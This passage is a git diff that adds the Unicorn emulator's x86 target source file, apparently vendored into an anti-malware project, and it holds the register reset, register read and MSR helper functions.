100644 index 0000000..9ab5dd2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.c @@ -0,0 +1,1528 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/i386/pc.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "tcg.h" +#include "unicorn_common.h" +#include /* needed for uc_x86_mmr */ +#include "uc_priv.h" + +#define FPST(n) (X86_CPU(uc, mycpu)->env.fpregs[(X86_CPU(uc, mycpu)->env.fpstt + (n)) & 7].d) + +#define X86_NON_CS_FLAGS (DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK) +static void load_seg_16_helper(CPUX86State *env, int seg, uint32_t selector) +{ + cpu_x86_load_seg_cache(env, seg, selector, (selector << 4), 0xffff, X86_NON_CS_FLAGS); +} + + +extern void helper_wrmsr(CPUX86State *env); +extern void helper_rdmsr(CPUX86State *env); + +const int X86_REGS_STORAGE_SIZE = offsetof(CPUX86State, tlb_table); + +static void x86_set_pc(struct uc_struct *uc, uint64_t address) +{ + CPUState* 
cpu = uc->cpu; + int16_t cs = (uint16_t)X86_CPU(uc, cpu)->env.segs[R_CS].selector; + if(uc->mode == UC_MODE_16) + ((CPUX86State *)uc->current_cpu->env_ptr)->eip = address - cs*16; + else + ((CPUX86State *)uc->current_cpu->env_ptr)->eip = address; +} + +void x86_release(void *ctx); + +void x86_release(void *ctx) +{ + int i; + TCGContext *s = (TCGContext *) ctx; + + cpu_breakpoint_remove_all(s->uc->cpu, BP_CPU); + + release_common(ctx); + + // arch specific + g_free(s->cpu_A0); + g_free(s->cpu_T[0]); + g_free(s->cpu_T[1]); + g_free(s->cpu_tmp0); + g_free(s->cpu_tmp4); + g_free(s->cpu_cc_srcT); + g_free(s->cpu_cc_dst); + g_free(s->cpu_cc_src); + g_free(s->cpu_cc_src2); + + for (i = 0; i < CPU_NB_REGS; ++i) { + g_free(s->cpu_regs[i]); + } + + g_free(s->tb_ctx.tbs); +} + +void x86_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + + env->features[FEAT_1_EDX] = CPUID_CX8 | CPUID_CMOV | CPUID_SSE2 | CPUID_FXSR | CPUID_SSE | CPUID_CLFLUSH; + env->features[FEAT_1_ECX] = CPUID_EXT_SSSE3 | CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_AES | CPUID_EXT_CX16; + env->features[FEAT_8000_0001_EDX] = CPUID_EXT2_3DNOW | CPUID_EXT2_RDTSCP; + env->features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_ABM | CPUID_EXT3_SKINIT | CPUID_EXT3_CR8LEG; + env->features[FEAT_7_0_EBX] = CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP; + + memset(env->regs, 0, sizeof(env->regs)); + memset(env->segs, 0, sizeof(env->segs)); + memset(env->cr, 0, sizeof(env->cr)); + + memset(&env->ldt, 0, sizeof(env->ldt)); + memset(&env->gdt, 0, sizeof(env->gdt)); + memset(&env->tr, 0, sizeof(env->tr)); + memset(&env->idt, 0, sizeof(env->idt)); + + env->eip = 0; + env->eflags = 0; + env->eflags0 = 0; + env->cc_op = CC_OP_EFLAGS; + + env->fpstt = 0; /* top of stack index */ + env->fpus = 0; + env->fpuc = 0; + memset(env->fptags, 0, sizeof(env->fptags)); /* 0 = valid, 1 = empty */ + + env->mxcsr = 0; + memset(env->xmm_regs, 0, sizeof(env->xmm_regs)); + 
memset(&env->xmm_t0, 0, sizeof(env->xmm_t0)); + memset(&env->mmx_t0, 0, sizeof(env->mmx_t0)); + + memset(env->ymmh_regs, 0, sizeof(env->ymmh_regs)); + + memset(env->opmask_regs, 0, sizeof(env->opmask_regs)); + memset(env->zmmh_regs, 0, sizeof(env->zmmh_regs)); + + /* sysenter registers */ + env->sysenter_cs = 0; + env->sysenter_esp = 0; + env->sysenter_eip = 0; + env->efer = 0; + env->star = 0; + + env->vm_hsave = 0; + + env->tsc = 0; + env->tsc_adjust = 0; + env->tsc_deadline = 0; + + env->mcg_status = 0; + env->msr_ia32_misc_enable = 0; + env->msr_ia32_feature_control = 0; + + env->msr_fixed_ctr_ctrl = 0; + env->msr_global_ctrl = 0; + env->msr_global_status = 0; + env->msr_global_ovf_ctrl = 0; + memset(env->msr_fixed_counters, 0, sizeof(env->msr_fixed_counters)); + memset(env->msr_gp_counters, 0, sizeof(env->msr_gp_counters)); + memset(env->msr_gp_evtsel, 0, sizeof(env->msr_gp_evtsel)); + +#ifdef TARGET_X86_64 + memset(env->hi16_zmm_regs, 0, sizeof(env->hi16_zmm_regs)); + env->lstar = 0; + env->cstar = 0; + env->fmask = 0; + env->kernelgsbase = 0; +#endif + + // TODO: reset other registers in CPUX86State qemu/target-i386/cpu.h + + // properly initialize internal setup for each mode + switch(uc->mode) { + default: + break; + case UC_MODE_16: + env->hflags = 0; + env->cr[0] = 0; + //undo the damage done by the memset of env->segs above + //for R_CS, not quite the same as x86_cpu_reset + cpu_x86_load_seg_cache(env, R_CS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_CS_MASK | + DESC_R_MASK | DESC_A_MASK); + //remainder yields same state as x86_cpu_reset + load_seg_16_helper(env, R_DS, 0); + load_seg_16_helper(env, R_ES, 0); + load_seg_16_helper(env, R_SS, 0); + load_seg_16_helper(env, R_FS, 0); + load_seg_16_helper(env, R_GS, 0); + + break; + case UC_MODE_32: + env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_OSFXSR_MASK; + cpu_x86_update_cr0(env, CR0_PE_MASK); // protected mode + break; + case UC_MODE_64: + env->hflags |= HF_CS32_MASK | HF_SS32_MASK | 
HF_CS64_MASK | HF_LMA_MASK | HF_OSFXSR_MASK; + env->hflags &= ~(HF_ADDSEG_MASK); + env->efer |= MSR_EFER_LMA | MSR_EFER_LME; // extended mode activated + cpu_x86_update_cr0(env, CR0_PE_MASK); // protected mode + /* If we are operating in 64bit mode then add the Long Mode flag + * to the CPUID feature flag + */ + env->features[FEAT_8000_0001_EDX] |= CPUID_EXT2_LM; + break; + } +} + +static int x86_msr_read(struct uc_struct *uc, uc_x86_msr *msr) +{ + CPUX86State *env = (CPUX86State *)uc->cpu->env_ptr; + uint64_t ecx = env->regs[R_ECX]; + uint64_t eax = env->regs[R_EAX]; + uint64_t edx = env->regs[R_EDX]; + + env->regs[R_ECX] = msr->rid; + helper_rdmsr(env); + + msr->value = ((uint32_t)env->regs[R_EAX]) | + ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); + + env->regs[R_EAX] = eax; + env->regs[R_ECX] = ecx; + env->regs[R_EDX] = edx; + + /* The implementation doesn't throw exception or return an error if there is one, so + * we will return 0. */ + return 0; +} + +static int x86_msr_write(struct uc_struct *uc, uc_x86_msr *msr) +{ + CPUX86State *env = (CPUX86State *)uc->cpu->env_ptr; + uint64_t ecx = env->regs[R_ECX]; + uint64_t eax = env->regs[R_EAX]; + uint64_t edx = env->regs[R_EDX]; + + env->regs[R_ECX] = msr->rid; + env->regs[R_EAX] = (unsigned int)msr->value; + env->regs[R_EDX] = (unsigned int)(msr->value >> 32); + helper_wrmsr(env); + + env->regs[R_ECX] = ecx; + env->regs[R_EAX] = eax; + env->regs[R_EDX] = edx; + + /* The implementation doesn't throw exception or return an error if there is one, so + * we will return 0. 
*/ + return 0; +} + +int x86_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + switch(regid) { + default: + break; + case UC_X86_REG_FP0: + case UC_X86_REG_FP1: + case UC_X86_REG_FP2: + case UC_X86_REG_FP3: + case UC_X86_REG_FP4: + case UC_X86_REG_FP5: + case UC_X86_REG_FP6: + case UC_X86_REG_FP7: + { + floatx80 reg = X86_CPU(uc, mycpu)->env.fpregs[regid - UC_X86_REG_FP0].d; + cpu_get_fp80(value, (uint16_t*)((char*)value+sizeof(uint64_t)), reg); + } + continue; + case UC_X86_REG_FPSW: + { + uint16_t fpus = X86_CPU(uc, mycpu)->env.fpus; + fpus = fpus & ~0x3800; + fpus |= ( X86_CPU(uc, mycpu)->env.fpstt & 0x7 ) << 11; + *(uint16_t*) value = fpus; + } + continue; + case UC_X86_REG_FPCW: + *(uint16_t*) value = X86_CPU(uc, mycpu)->env.fpuc; + continue; + case UC_X86_REG_FPTAG: + { + #define EXPD(fp) (fp.l.upper & 0x7fff) + #define MANTD(fp) (fp.l.lower) + #define MAXEXPD 0x7fff + int fptag, exp, i; + uint64_t mant; + CPU_LDoubleU tmp; + fptag = 0; + for (i = 7; i >= 0; i--) { + fptag <<= 2; + if (X86_CPU(uc, mycpu)->env.fptags[i]) { + fptag |= 3; + } else { + tmp.d = X86_CPU(uc, mycpu)->env.fpregs[i].d; + exp = EXPD(tmp); + mant = MANTD(tmp); + if (exp == 0 && mant == 0) { + /* zero */ + fptag |= 1; + } else if (exp == 0 || exp == MAXEXPD + || (mant & (1LL << 63)) == 0) { + /* NaNs, infinity, denormal */ + fptag |= 2; + } + } + } + *(uint16_t*) value = fptag; + } + continue; + case UC_X86_REG_XMM0: + case UC_X86_REG_XMM1: + case UC_X86_REG_XMM2: + case UC_X86_REG_XMM3: + case UC_X86_REG_XMM4: + case UC_X86_REG_XMM5: + case UC_X86_REG_XMM6: + case UC_X86_REG_XMM7: + { + float64 *dst = (float64*)value; + XMMReg *reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_XMM0]; + dst[0] = reg->_d[0]; + dst[1] = reg->_d[1]; + continue; + } + case UC_X86_REG_ST0: + case UC_X86_REG_ST1: + case UC_X86_REG_ST2: + case 
UC_X86_REG_ST3: + case UC_X86_REG_ST4: + case UC_X86_REG_ST5: + case UC_X86_REG_ST6: + case UC_X86_REG_ST7: + { + // value must be big enough to keep 80 bits (10 bytes) + memcpy(value, &FPST(regid - UC_X86_REG_ST0), 10); + continue; + } + case UC_X86_REG_YMM0: + case UC_X86_REG_YMM1: + case UC_X86_REG_YMM2: + case UC_X86_REG_YMM3: + case UC_X86_REG_YMM4: + case UC_X86_REG_YMM5: + case UC_X86_REG_YMM6: + case UC_X86_REG_YMM7: + case UC_X86_REG_YMM8: + case UC_X86_REG_YMM9: + case UC_X86_REG_YMM10: + case UC_X86_REG_YMM11: + case UC_X86_REG_YMM12: + case UC_X86_REG_YMM13: + case UC_X86_REG_YMM14: + case UC_X86_REG_YMM15: + { + float64 *dst = (float64*)value; + XMMReg *lo_reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_YMM0]; + XMMReg *hi_reg = &X86_CPU(uc, mycpu)->env.ymmh_regs[regid - UC_X86_REG_YMM0]; + dst[0] = lo_reg->_d[0]; + dst[1] = lo_reg->_d[1]; + dst[2] = hi_reg->_d[0]; + dst[3] = hi_reg->_d[1]; + continue; + } + } + + switch(uc->mode) { + default: + break; + case UC_MODE_16: + switch(regid) { + default: break; + case UC_X86_REG_ES: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_ES].selector; + continue; + case UC_X86_REG_SS: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_SS].selector; + continue; + case UC_X86_REG_DS: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_DS].selector; + continue; + case UC_X86_REG_FS: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_FS].selector; + continue; + case UC_X86_REG_GS: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_GS].selector; + continue; + case UC_X86_REG_FS_BASE: + *(uint32_t *)value = (uint32_t)X86_CPU(uc, mycpu)->env.segs[R_FS].base; + continue; + } + // fall-thru + case UC_MODE_32: + switch(regid) { + default: + break; + case UC_X86_REG_CR0: + case UC_X86_REG_CR1: + case UC_X86_REG_CR2: + case UC_X86_REG_CR3: + case UC_X86_REG_CR4: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.cr[regid - UC_X86_REG_CR0]; + break; + case UC_X86_REG_DR0: + case UC_X86_REG_DR1: + case 
UC_X86_REG_DR2: + case UC_X86_REG_DR3: + case UC_X86_REG_DR4: + case UC_X86_REG_DR5: + case UC_X86_REG_DR6: + case UC_X86_REG_DR7: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.dr[regid - UC_X86_REG_DR0]; + break; + case UC_X86_REG_EFLAGS: + *(int32_t *)value = cpu_compute_eflags(&X86_CPU(uc, mycpu)->env); + break; + case UC_X86_REG_EAX: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EAX]; + break; + case UC_X86_REG_AX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_EBX: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EBX]; + break; + case UC_X86_REG_BX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_ECX: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ECX]; + break; + case UC_X86_REG_CX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_EDX: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EDX]; + break; + case UC_X86_REG_DX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_ESP: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ESP]; + break; + case 
UC_X86_REG_SP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESP]); + break; + case UC_X86_REG_EBP: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EBP]; + break; + case UC_X86_REG_BP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBP]); + break; + case UC_X86_REG_ESI: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ESI]; + break; + case UC_X86_REG_SI: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESI]); + break; + case UC_X86_REG_EDI: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EDI]; + break; + case UC_X86_REG_DI: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDI]); + break; + case UC_X86_REG_EIP: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.eip; + break; + case UC_X86_REG_IP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.eip); + break; + case UC_X86_REG_CS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_CS].selector; + break; + case UC_X86_REG_DS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_DS].selector; + break; + case UC_X86_REG_SS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_SS].selector; + break; + case UC_X86_REG_ES: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_ES].selector; + break; + case UC_X86_REG_FS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_FS].selector; + break; + case UC_X86_REG_GS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_GS].selector; + break; + case UC_X86_REG_IDTR: + ((uc_x86_mmr *)value)->limit = (uint16_t)X86_CPU(uc, mycpu)->env.idt.limit; + ((uc_x86_mmr *)value)->base = (uint32_t)X86_CPU(uc, mycpu)->env.idt.base; + break; + case UC_X86_REG_GDTR: + ((uc_x86_mmr *)value)->limit = (uint16_t)X86_CPU(uc, mycpu)->env.gdt.limit; + ((uc_x86_mmr *)value)->base = (uint32_t)X86_CPU(uc, mycpu)->env.gdt.base; + break; + case UC_X86_REG_LDTR: + ((uc_x86_mmr *)value)->limit = X86_CPU(uc, mycpu)->env.ldt.limit; + ((uc_x86_mmr *)value)->base = 
(uint32_t)X86_CPU(uc, mycpu)->env.ldt.base; + ((uc_x86_mmr *)value)->selector = (uint16_t)X86_CPU(uc, mycpu)->env.ldt.selector; + ((uc_x86_mmr *)value)->flags = X86_CPU(uc, mycpu)->env.ldt.flags; + break; + case UC_X86_REG_TR: + ((uc_x86_mmr *)value)->limit = X86_CPU(uc, mycpu)->env.tr.limit; + ((uc_x86_mmr *)value)->base = (uint32_t)X86_CPU(uc, mycpu)->env.tr.base; + ((uc_x86_mmr *)value)->selector = (uint16_t)X86_CPU(uc, mycpu)->env.tr.selector; + ((uc_x86_mmr *)value)->flags = X86_CPU(uc, mycpu)->env.tr.flags; + break; + case UC_X86_REG_MSR: + x86_msr_read(uc, (uc_x86_msr *)value); + break; + case UC_X86_REG_MXCSR: + *(uint32_t *)value = X86_CPU(uc, mycpu)->env.mxcsr; + break; + case UC_X86_REG_FS_BASE: + *(uint32_t *)value = (uint32_t)X86_CPU(uc, mycpu)->env.segs[R_FS].base; + break; + } + break; + +#ifdef TARGET_X86_64 + case UC_MODE_64: + switch(regid) { + default: + break; + case UC_X86_REG_CR0: + case UC_X86_REG_CR1: + case UC_X86_REG_CR2: + case UC_X86_REG_CR3: + case UC_X86_REG_CR4: + *(int64_t *)value = X86_CPU(uc, mycpu)->env.cr[regid - UC_X86_REG_CR0]; + break; + case UC_X86_REG_DR0: + case UC_X86_REG_DR1: + case UC_X86_REG_DR2: + case UC_X86_REG_DR3: + case UC_X86_REG_DR4: + case UC_X86_REG_DR5: + case UC_X86_REG_DR6: + case UC_X86_REG_DR7: + *(int64_t *)value = X86_CPU(uc, mycpu)->env.dr[regid - UC_X86_REG_DR0]; + break; + case UC_X86_REG_EFLAGS: + *(int64_t *)value = cpu_compute_eflags(&X86_CPU(uc, mycpu)->env); + break; + case UC_X86_REG_RAX: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EAX]; + break; + case UC_X86_REG_EAX: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_RBX: + *(uint64_t 
*)value = X86_CPU(uc, mycpu)->env.regs[R_EBX]; + break; + case UC_X86_REG_EBX: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_RCX: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ECX]; + break; + case UC_X86_REG_ECX: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_RDX: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EDX]; + break; + case UC_X86_REG_EDX: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_RSP: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ESP]; + break; + case UC_X86_REG_ESP: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ESP]); + break; + case UC_X86_REG_SP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESP]); + break; + case UC_X86_REG_SPL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ESP]); + break; + case UC_X86_REG_RBP: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EBP]; + break; + case UC_X86_REG_EBP: + *(int32_t *)value = 
READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EBP]); + break; + case UC_X86_REG_BP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBP]); + break; + case UC_X86_REG_BPL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBP]); + break; + case UC_X86_REG_RSI: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ESI]; + break; + case UC_X86_REG_ESI: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ESI]); + break; + case UC_X86_REG_SI: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESI]); + break; + case UC_X86_REG_SIL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ESI]); + break; + case UC_X86_REG_RDI: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EDI]; + break; + case UC_X86_REG_EDI: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EDI]); + break; + case UC_X86_REG_DI: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDI]); + break; + case UC_X86_REG_DIL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDI]); + break; + case UC_X86_REG_RIP: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.eip; + break; + case UC_X86_REG_EIP: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.eip); + break; + case UC_X86_REG_IP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.eip); + break; + case UC_X86_REG_CS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_CS].selector; + break; + case UC_X86_REG_DS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_DS].selector; + break; + case UC_X86_REG_SS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_SS].selector; + break; + case UC_X86_REG_ES: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_ES].selector; + break; + case UC_X86_REG_FS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_FS].selector; + break; + case UC_X86_REG_GS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_GS].selector; + break; + case 
UC_X86_REG_R8: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[8]); + break; + case UC_X86_REG_R8D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[8]); + break; + case UC_X86_REG_R8W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[8]); + break; + case UC_X86_REG_R8B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[8]); + break; + case UC_X86_REG_R9: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[9]); + break; + case UC_X86_REG_R9D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[9]); + break; + case UC_X86_REG_R9W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[9]); + break; + case UC_X86_REG_R9B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[9]); + break; + case UC_X86_REG_R10: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[10]); + break; + case UC_X86_REG_R10D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[10]); + break; + case UC_X86_REG_R10W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[10]); + break; + case UC_X86_REG_R10B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[10]); + break; + case UC_X86_REG_R11: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[11]); + break; + case UC_X86_REG_R11D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[11]); + break; + case UC_X86_REG_R11W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[11]); + break; + case UC_X86_REG_R11B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[11]); + break; + case UC_X86_REG_R12: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[12]); + break; + case UC_X86_REG_R12D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[12]); + break; + case UC_X86_REG_R12W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[12]); + break; + case UC_X86_REG_R12B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[12]); + break; + case 
UC_X86_REG_R13: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[13]); + break; + case UC_X86_REG_R13D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[13]); + break; + case UC_X86_REG_R13W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[13]); + break; + case UC_X86_REG_R13B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[13]); + break; + case UC_X86_REG_R14: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[14]); + break; + case UC_X86_REG_R14D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[14]); + break; + case UC_X86_REG_R14W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[14]); + break; + case UC_X86_REG_R14B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[14]); + break; + case UC_X86_REG_R15: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[15]); + break; + case UC_X86_REG_R15D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[15]); + break; + case UC_X86_REG_R15W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[15]); + break; + case UC_X86_REG_R15B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[15]); + break; + case UC_X86_REG_IDTR: + ((uc_x86_mmr *)value)->limit = (uint16_t)X86_CPU(uc, mycpu)->env.idt.limit; + ((uc_x86_mmr *)value)->base = X86_CPU(uc, mycpu)->env.idt.base; + break; + case UC_X86_REG_GDTR: + ((uc_x86_mmr *)value)->limit = (uint16_t)X86_CPU(uc, mycpu)->env.gdt.limit; + ((uc_x86_mmr *)value)->base = X86_CPU(uc, mycpu)->env.gdt.base; + break; + case UC_X86_REG_LDTR: + ((uc_x86_mmr *)value)->limit = X86_CPU(uc, mycpu)->env.ldt.limit; + ((uc_x86_mmr *)value)->base = X86_CPU(uc, mycpu)->env.ldt.base; + ((uc_x86_mmr *)value)->selector = (uint16_t)X86_CPU(uc, mycpu)->env.ldt.selector; + ((uc_x86_mmr *)value)->flags = X86_CPU(uc, mycpu)->env.ldt.flags; + break; + case UC_X86_REG_TR: + ((uc_x86_mmr *)value)->limit = X86_CPU(uc, mycpu)->env.tr.limit; + ((uc_x86_mmr *)value)->base = 
